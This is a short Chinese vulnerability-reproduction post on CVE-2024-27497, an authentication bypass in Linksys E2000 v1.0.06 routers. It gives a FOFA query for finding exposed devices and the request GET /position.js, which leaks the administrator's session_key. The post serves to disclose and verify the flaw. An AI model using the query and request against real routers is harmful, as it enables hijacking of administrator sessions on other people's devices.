【漏洞复现】Linksys E2000 position.js 身份验证绕过漏洞(CVE-2024-27497)

0x01 产品简介

Linksys E2000是一款由思科(Cisco)品牌推出的无线路由器,它是一款支持2.4GHz和5GHz双频段的无线路由器,用户可以避开拥挤的2.4GHz频段,独自享受5GHz频段的高速无线生活。

0x02 漏洞概述

Linksys E2000 v1.0.06 存在身份验证绕过漏洞,未授权的攻击者可以通过该漏洞获取管理员的当前会话,从而绕过身份验证。

0x03 测绘语句

复制代码
FOFA:app="LINKSYS-E2000"

0x04 漏洞复现

复制代码
GET /position.js HTTP/1.1
复制代码
如访问 /position.js路由存在 session_key和close_session字段,则证明存在此漏洞。

0x05 影响范围

复制代码
Linksys E2000 v1.0.06

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
LB211213 分钟前
TCP与UDP:网络传输协议比较
网络·tcp/ip·udp
AORO_BEIDOU40 分钟前
遨游科普:三防平板是什么?应用在什么场景?
网络·安全·电脑·信息与通信
独行soc1 小时前
2025年渗透测试面试题总结-安恒[实习]安全服务工程师(题目+回答)
linux·数据库·安全·web安全·面试·职场和发展·渗透测试
小峰编程1 小时前
Python函数——万字详解
linux·运维·服务器·开发语言·前端·网络·python
Swift社区1 小时前
Feature Toggle 不再乱:如何设计一个干净、安全、可控的特性开关系统?
安全
Dachui_11221 小时前
华为鸿蒙电脑发布,企业运营效率可以提高吗?
安全·华为
hao_wujing1 小时前
人工智能视角下的安全:可视化如何塑造恶意软件检测
人工智能·安全
白码低代码1 小时前
质检LIMS系统检测数据可视化大屏 全流程提效 + 合规安全双保障方案
安全·信息可视化·lims·实验室管理系统
AORO_BEIDOU2 小时前
遨游科普:三防平板是什么?有什么作用?
5g·安全·智能手机·电脑·信息与通信
南棱笑笑生2 小时前
20250515通过以太网让VLC拉取视熙科技的机芯的rtsp视频流的步骤
网络